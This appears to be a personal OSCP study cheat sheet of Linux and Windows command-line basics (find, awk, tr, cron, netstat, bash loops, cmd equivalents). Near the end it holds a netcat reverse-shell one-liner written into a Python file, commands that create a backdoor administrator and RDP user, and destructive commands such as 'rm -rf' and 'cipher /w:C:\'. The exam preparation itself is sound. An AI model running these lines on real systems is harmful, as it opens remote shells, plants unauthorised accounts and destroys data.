Linux main commands in OSCP

Find:

```bash
# Search the whole filesystem for a file; send "permission denied" output to /dev/null
find / -name file 2>/dev/null

# Sort the listing by last modified time (-t time, -r reverse)
ls -ltr

# Remove a directory recursively together with its content. Very dangerous command!
rm -rf ./directory

# List what rights the current user has through sudo
sudo -l
```

Which

Outputs the path of the binary you are looking for. It searches the directories defined in your $PATH variable.

```bash
which bash
# Usually outputs: /bin/bash
```

Filters

```bash
# sort
sort test.txt

# uniq
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName
```

Other filters: grep, head, tail, tr, sed (for example `sed "1d"` deletes the first line).

cut

Given a line such as `64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms`:

```bash
cut -d" " -f4
```

-d stands for delimiter and -f for field, so this prints the fourth space-separated field.

tr - Translate

```bash
# Transform all letters into capital letters
tr "[:lower:]" "[:upper:]" < file1 > file2

# Remove characters (here: all dots)
cat file.txt | tr -d "."

# Replace all dots with underscores
cat file.txt | tr "." "_"
```

awk

```bash
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse

awk '/172.16.40.10.81/' error.log

awk '{print}' filename

# The -F flag sets a custom delimiter
awk -F ':' '{print $1}' test.txt
```

When manipulating text you may want to start the output with some information about the columns. The BEGIN keyword runs its block before the first line is read; END runs after the last line:

```bash
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
```

Cron, devices and services

```bash
# List cronjobs
crontab -l

# Edit or create new cronjobs
crontab -e

# List all devices
fdisk -l

# Systemctl
systemctl start ssh
systemctl status ssh
systemctl stop ssh
```

Netstat - Find outgoing and incoming connections

Netstat is a multiplatform tool, so it works on Mac, Windows and Linux.

```bash
netstat -antlp
netstat -anpt
```

iptables

```bash
# List the rules
iptables -L

# Remove one specific rule (rule number 2 of the INPUT chain)
iptables -D INPUT 2
```
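As an added example (not from the original notes), the filters above chained into a small detection check: count failed SSH logins per source IP over constructed auth-log lines. The log lines are made up for the example.

```shell
#!/bin/bash
# Added example: grep, cut, sort, uniq and awk combined to summarise
# failed SSH logins per source IP. Input is constructed, not a real log.

SAMPLE_LOG='Jan 10 10:00:01 host sshd[111]: Failed password for root from 192.168.0.5 port 4422 ssh2
Jan 10 10:00:03 host sshd[112]: Failed password for admin from 192.168.0.5 port 4423 ssh2
Jan 10 10:00:05 host sshd[113]: Accepted password for sam from 192.168.0.7 port 5000 ssh2
Jan 10 10:00:09 host sshd[114]: Failed password for root from 10.0.0.9 port 6001 ssh2'

# Print "<count> <ip>" for every IP with failed logins, most frequent first.
# On a "Failed password" line the source IP is the 11th space-separated field.
failed_by_ip() {
    printf '%s\n' "$SAMPLE_LOG" \
        | grep 'Failed password' \
        | cut -d' ' -f11 \
        | sort \
        | uniq -c \
        | sort -rn \
        | awk '{print $1, $2}'
}

# Same summary done entirely in awk: count matches per $11 in an array,
# then print the totals from the END block.
failed_by_ip_awk() {
    printf '%s\n' "$SAMPLE_LOG" \
        | awk '/Failed password/ {c[$11]++} END {for (ip in c) print c[ip], ip}' \
        | sort -rn
}

failed_by_ip
failed_by_ip_awk
```

`cut -d' '` breaks on lines where the day is padded with a second space (`Jan  9`), because each extra space becomes an empty field; awk splits on runs of whitespace, so the second function is the more robust one.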
Iteration over a file
This script will iterate over a file and echo out every single line:

```bash
#!/bin/bash

# Note: $(cat ...) splits on any whitespace, not only on newlines
for line in $(cat file.txt); do
    echo "$line"
done
```
Another Way
```bash
#!/bin/bash

# Reads one line at a time; -r keeps backslashes in the line literal
while read -r p; do
    echo "$p"
done < file.txt
```
For Loops
```bash
#!/bin/bash

for ((i = 0; i < 10; i++)); do
    echo $i
done
```

Another way to write this is by using the program seq. Seq is pretty much like range() in Python, so it can be used like this:

```bash
#!/bin/bash

for x in `seq 1 100`; do
    echo $x
done
```

Using command output as an argument

```bash
#!/bin/bash

locate 646.c | tail -n 1
```

The last match can be passed straight to another command with $(...):

```bash
#!/bin/bash

cat $(locate 646.c | tail -n 1)
```
VI Operators
Operators are commands that do things, like delete, change or copy.

c - change
ce - change until the end of the word
c$ - change until the end of the line

Combining Motions and Operators

Now that you know some motion commands and operator commands, you can start combining them.

dw - delete word
d$ - delete to the end of the line
Password Creation
```bash
# Generate a password hash for the password "sam"
openssl passwd sam
```
Windows Commands
cmd:

```batch
:: Show hidden files
dir /A

:: Print out file content, like cat
type file.txt

:: grep files
findstr file.txt

:: Show network information
netstat -an

:: Show network adapter info
ipconfig

:: Traceroute
tracert

:: List processes
tasklist

:: Kill a process
taskkill /PID 1532 /F

:: Shreds the whole machine
cipher /w:C:\

:: Mounting - Mapping
wmic logicaldisk get deviceid, volumename, description
```
Scripts for fun
Make request:

```python
import requests

req = requests.get("http://site.com")
print(req.status_code)
print(req.text)
```

Read and write to files:

```python
# Print every line without its trailing newline and flag the marker line
with open("readme.txt", "r") as file_open:
    for line in file_open:
        print(line.strip("\n"))
        if line.strip("\n") == "rad 4":
            print("last line")
```

```bash
echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py
```
Add RDP User
Windows

Add RDP user:

```batch
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add
```
Enable RDP via Registry
Enable RDP via registry